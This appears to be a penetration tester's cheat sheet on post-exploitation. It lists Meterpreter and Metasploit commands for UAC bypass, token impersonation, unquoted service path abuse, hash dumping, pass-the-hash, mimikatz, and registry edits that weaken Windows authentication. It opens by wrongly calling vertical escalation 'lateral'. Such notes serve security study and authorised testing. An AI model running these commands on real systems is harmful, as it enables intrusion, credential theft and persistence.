Lateral Priv Esc: Elevating to higher privileges
Horizontal Priv Esc: Maintaining same privileges but a different identity
Access should be stable, privileged, and persistent.
Stable:
Migrating to a new process after initial access. Why? If the user closes a web browser/other process we are running under, we will lose our session.
From meterpreter:
ps
migrate <pid>
Persistence:
Typically requires elevated privileges.
exploit/<OS>/local for local exploits in metasploit
Checking for UAC on Windows host:
post/windows/gather/win_privs = UAC Enabled column will indicate the UAC status
search bypassuac
use <Exploit>
set SESSION #
run post/windows/gather/win_privs to verify bypassuac worked
getsystem may succeed after elevating to higher privileges
getuid provides the current user id; can check to ensure getsystem worked
Incognito: Allows a SYSTEM user to access local user tokens in memory and utilize them for authentication.
use incognito
list_tokens -u
impersonate_token <token>
Unquoted Service Path
Discovering an unquoted path to a service binary.
Inserting a malicious executable into the uquoted path will make Windows execute the program; this requires you have the correct permissions to write to any certain folder within the path.
Search for unquoted service path using wmic:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Search for unquoted service path manually with sc:
sc qc <ServiceName>
Metasploit Module:
use exploit/windows/local/trusted_service_path
Identifying OS/Applications running:
Meterpreter:
sysinfo
getuid
run post/linux/gather/enum_system
Compiling publicly available exploits on Linux:
Upload the source code to the target using upload...etc.
Compile code -gcc <SourceCode> -o <OutputFile>
Run the exploit - ./<Exploit>
Compile 32bit exploit on a 64bit system with gcc:
gcc -m32 -o <OutputFile> <SourceCode>
Then upload the file and run it.
Replace DLLs or executables with malicious ones.
Shellter Obsfucation: https://www.shellterproject.com/introducing-shellter/
Dumping Hashes:
Using Meterpreter run run hashdump
Pass the Hash with psexec:
use exploit/windows/smb/psexec best to do with administrative credentials
If using a user that is part of the admistrators group but has a RID in the 500s, you may need to make registry changes to allow pass-the-hash.
Registry Key to allow local users to pass the hash:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
AND
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 0 /f
PTH with xfreerdp:
xfreerdp /u:<User> /d:<DomainName> /pth:<HASH> /v:<TargetIP>
https://github.com/gentilkiwi/mimikatz/wiki
ps -A <Architecture> -s = List processes running as SYSTEM
migrate <PID>
load mimikatz
wdigest = Attempts to rerieve plaintext passwords
Enabling RDP
Check for all enabled services:
net start
With wmic:
wmic service where 'Caption like "Remote%" and started=true' get Caption
With meterpreter:
run post/gather/windows/enum_services
ENABLING RDP:
run getgui -h
run post/windows/gather/
run post/linux/gather/
run post/gather/credentials/
Search victim browser history for internal corporate websites/network information.